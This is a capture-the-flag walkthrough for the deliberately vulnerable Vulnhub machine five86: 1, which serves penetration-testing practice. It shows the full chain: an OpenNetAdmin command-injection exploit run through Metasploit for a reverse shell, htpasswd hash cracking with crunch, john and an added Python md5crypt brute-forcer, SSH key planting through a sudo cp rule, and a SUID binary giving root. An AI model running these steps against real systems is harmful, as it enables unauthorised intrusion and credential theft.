five86: 1 Walkthrough Vulnhub CTF
Today we are solving five86: 1, created by DCAUC. This VM is a purposely built vulnerable lab intended for gaining hands-on experience in penetration testing.
Download here five86: 1
Network Scanning
Our first step is to identify the target's IP address on the local network; we start with netdiscover.
netdiscover

Next, an aggressive nmap scan (-A enables OS and version detection, default scripts and traceroute) shows three open ports on the target: 22 (SSH), 80 (HTTP) and 10000 (Webmin's httpd). Note that -A on its own only covers nmap's default top 1000 ports; add -p- for a full port sweep.
nmap -A 192.168.1.7

Enumeration
Enumerating the HTTP service on port 80, we open the IP address in a web browser.
We find an /ona directory that looks like an OpenNetAdmin installation. Its About page reveals the OpenNetAdmin version.
http://192.168.1.7/ona

On exploit-db we search for OpenNetAdmin v18.1.1 and find a command-injection exploit, EDB-ID 47772 (a Ruby Metasploit module), which we download to our local system.

To add the exploit to Metasploit, copy the module from the Downloads directory into the Metasploit modules tree and start msfconsole. Dropping it straight into modules/exploits/ is why it is addressed as exploit/47772 below; a path under ~/.msf4/modules/exploits/ is the cleaner choice because it survives framework upgrades, and if msfconsole is already running, reload_all picks the new module up.
cp /root/Downloads/47772.rb /usr/share/metasploit-framework/modules/exploits/
msfconsole

use exploit/47772
set rhosts 192.168.1.7
set lhost 192.168.1.4
run
Session 1 opens and we have a reverse connection from the target machine.

The shell it gives is not a proper TTY, so we upgrade it with the Python pty one-liner. As this machine ships with Python 3, we use the python3 variant:
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
id

ls -lsa lists hidden files and directories as well; among them is a .htpasswd file, which we read. It holds a username and an Apache htpasswd hash, together with a note that the password is 10 characters long and uses only the letters a, e, f, h, r and t.
ls -lsa
cat .htpasswd

Privilege Escalation
We save the hash line from .htpasswd into a file named hash and check it:
cat hash

Now we generate a wordlist with crunch: every candidate exactly 10 characters long (minimum and maximum length both 10) and drawn only from the characters aefhrt named in the note. That keyspace is 6^10 = 60,466,176 words, roughly 634 MiB on disk; piping crunch straight into john --stdin avoids writing the file at all.
crunch 10 10 aefhrt >word.txt

Then we crack the hash with john using that custom wordlist:
john --wordlist=word.txt hash
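
What crunch and john are doing in the two commands above, as an added example (this is not code from the original walkthrough): a pure-Python reimplementation of the $apr1$ md5crypt format that Apache's htpasswd -m writes, assumed here to be the format of the hash in .htpasswd, plus a brute-force loop over the aefhrt keyspace. The .htpasswd line it cracks is constructed for the demo (user name douglas and salt Gm3Xk7Qp are chosen for the example) with a 3-character password so it finishes in a fraction of a second; the keyspace_size and wordlist_bytes helpers show why the real 10-character run is 60 million candidates and why writing them to disk costs over 600 MiB.

```python
#!/usr/bin/env python3
"""Added example: Apache $apr1$ (md5crypt) hashing and a crunch-style
brute force over a fixed alphabet, the way john processes an .htpasswd hash."""
import hashlib
import itertools
from typing import Iterator, Optional, Tuple

# crypt(3)'s custom base64 alphabet, used for the 22-character hash tail.
ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> bytes:
    """Encode the low 6*count bits of value, least-significant group first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password: bytes, salt: bytes, magic: bytes = b"$apr1$") -> str:
    """md5crypt as used by htpasswd -m ($apr1$) and classic glibc crypt ($1$)."""
    salt = salt[:8]
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    # Mix in the alternate sum, 16 bytes at a time, for len(password) bytes.
    remaining = len(password)
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    # The historical "bit walk" over the password length.
    bits = len(password)
    while bits:
        ctx.update(b"\x00" if bits & 1 else password[:1])
        bits >>= 1
    final = ctx.digest()
    # 1000 stretching rounds: this is what makes 6^10 candidates expensive.
    for i in range(1000):
        rnd = hashlib.md5()
        rnd.update(password if i & 1 else final)
        if i % 3:
            rnd.update(salt)
        if i % 7:
            rnd.update(password)
        rnd.update(final if i & 1 else password)
        final = rnd.digest()
    # Permuted base64 encoding of the 16-byte digest (22 characters).
    encoded = b"".join([
        _to64((final[0] << 16) | (final[6] << 8) | final[12], 4),
        _to64((final[1] << 16) | (final[7] << 8) | final[13], 4),
        _to64((final[2] << 16) | (final[8] << 8) | final[14], 4),
        _to64((final[3] << 16) | (final[9] << 8) | final[15], 4),
        _to64((final[4] << 16) | (final[10] << 8) | final[5], 4),
        _to64(final[11], 2),
    ])
    return (magic + salt + b"$" + encoded).decode()


def parse_htpasswd(line: str) -> Tuple[str, str, str]:
    """Split 'user:$apr1$salt$hash' into (user, salt, full hash string)."""
    user, hashed = line.strip().split(":", 1)
    if not hashed.startswith("$apr1$"):
        raise ValueError(f"unsupported hash type for {user}: {hashed[:6]}")
    salt = hashed.split("$")[2]
    return user, salt, hashed


def keyspace_size(alphabet: str, length: int) -> int:
    """Candidates emitted by `crunch length length alphabet`."""
    return len(alphabet) ** length


def wordlist_bytes(alphabet: str, length: int) -> int:
    """On-disk size of that wordlist: each line is the word plus a newline."""
    return keyspace_size(alphabet, length) * (length + 1)


def candidates(alphabet: str, length: int) -> Iterator[str]:
    """Stream the keyspace in alphabet order, like crunch, without touching disk."""
    for combo in itertools.product(alphabet, repeat=length):
        yield "".join(combo)


def crack_apr1(hashed: str, alphabet: str, length: int) -> Optional[str]:
    """Brute-force an $apr1$ hash over a fixed-length alphabet keyspace."""
    salt = hashed.split("$")[2].encode()
    for word in candidates(alphabet, length):
        if md5crypt(word.encode(), salt) == hashed:
            return word
    return None


# Constructed sample entry (not the hash from the VM): a 3-character password
# from the same alphabet, so the demo finishes quickly. Salt chosen arbitrarily.
SAMPLE_HTPASSWD = "douglas:" + md5crypt(b"fat", b"Gm3Xk7Qp")


def demo() -> dict:
    user, salt, hashed = parse_htpasswd(SAMPLE_HTPASSWD)
    return {
        "user": user,
        "salt": salt,
        "password": crack_apr1(hashed, "aefhrt", 3),
        "real_keyspace": keyspace_size("aefhrt", 10),
        "real_wordlist_mib": wordlist_bytes("aefhrt", 10) // (1024 * 1024),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it with python3. For the real 10-character keyspace, stream candidates into a proper cracker (crunch 10 10 aefhrt | john --stdin hash) rather than looping in Python: at 1000 MD5 rounds per candidate the pure-Python loop would take hours, whereas john's optimised md5crypt gets through 60 million words in minutes on a modern CPU.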

The hash cracks and gives us douglas's password, so we switch our shell from www-data to douglas and log in successfully:
su douglas
Run sudo -l to list the commands douglas may run with sudo. It shows that /bin/cp can be run as the user jen.
sudo -l

We generate an SSH key pair as douglas; its public half will be planted for the second user, jen:
ssh-keygen -b 2048
Copy the public key to the target's /tmp directory under the name authorized_keys:
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys

Make the file readable, then use the sudo rule to copy it as jen into /home/jen/.ssh/. (chmod 777 is more than needed: the file only has to be readable by jen. It works because cp creates the copy with jen's umask applied; sshd with StrictModes refuses an authorized_keys that ends up group- or world-writable, so 644 is the safer choice.)
cd /tmp
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/

Now we connect over SSH as jen with the new key and get in without being asked for a password:
ssh jen@192.168.1.7

After enumerating many directories, we find a mail message for jen in /var/mail:
cd /var/mail
ls
cat jen

The message contains moss's password, so we switch from jen to moss with su:
su moss

Searching the home directories for SUID binaries points at a hidden .games directory in moss's home:
find /home -type f -perm -u=s 2>/dev/null
cd /home/moss/.games/

Running the SUID binary upyourgame gives us a root shell, from which we read the flag:
./upyourgame
cd /root
cat flag.txt
